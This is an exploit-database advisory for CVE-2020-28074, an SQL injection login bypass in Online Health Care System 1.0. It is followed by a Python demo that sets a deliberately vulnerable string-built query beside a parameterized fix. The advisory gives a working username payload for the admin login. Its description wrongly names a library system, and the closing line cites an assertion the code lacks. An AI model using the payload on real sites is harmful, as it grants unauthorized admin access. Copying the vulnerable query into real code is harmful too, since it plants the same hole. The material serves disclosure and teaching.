## https://sploitus.com/exploit?id=PACKETSTORM:160599
# Exploit Title: Authentication Bypass via SQL injection on Online Health Care System 1.0  
# Date: 23/10/2020  
# Exploit Author: Valerio Alessandroni  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html  
# Version: 1.0  
# Tested on: ubuntu 18.04  
# CVE : CVE-2020-28074  
# Description:  
SQL injection on Library Management System v1.0 allows a potential attacker to bypass user authentication and impersonate every user on the system.  
# Reproduction:  
- Go to login page (http://127.0.0.1/HealthCare/Admin/adminlogin.php)  
- Intercept the login request and replace the parameters:  
username=admin@email.test' AND 1=1;-- -  
password=RandomlyText
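
Why the username value above defeats the password check, and what the corrected query looks like, as an added example that is not part of the advisory or the application's code. The table layout, query shape and account password are assumptions, and SQLite stands in for the application's database.

```python
import hashlib
import sqlite3

def pw_hash(password):
    # Fixed salt keeps the demo short; real code uses a per-user random salt.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"demo-salt", 100_000).hex()

def make_db():
    # Constructed schema and account: the application's real table and
    # query are not shown in the advisory, so this layout is an assumption.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO admin VALUES (?, ?)",
               ("admin@email.test", pw_hash("correct horse")))
    return db

def login_vulnerable(db, username, password):
    # Request values are pasted into the SQL text, so a quote in `username`
    # closes the string literal and the rest of the value is parsed as SQL.
    # The trailing "-- -" turns the password condition into a comment.
    sql = ("SELECT username FROM admin WHERE username = '%s' AND pw_hash = '%s'"
           % (username, pw_hash(password)))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, username, password):
    # Placeholders send the values separately from the statement, so the
    # quote and comment marker are compared as data, never parsed as SQL.
    row = db.execute(
        "SELECT username FROM admin WHERE username = ? AND pw_hash = ?",
        (username, pw_hash(password))).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "admin@email.test' AND 1=1;-- -"  # username value from the advisory
    for fn in (login_vulnerable, login_hardened):
        print(fn.__name__,
              "| valid credentials:", fn(db, "admin@email.test", "correct horse"),
              "| advisory payload:", fn(db, payload, "RandomlyText"))
```

The last assertion pattern, a login with the advisory's parameters returning no account, is a useful regression test to keep once the query is parameterized.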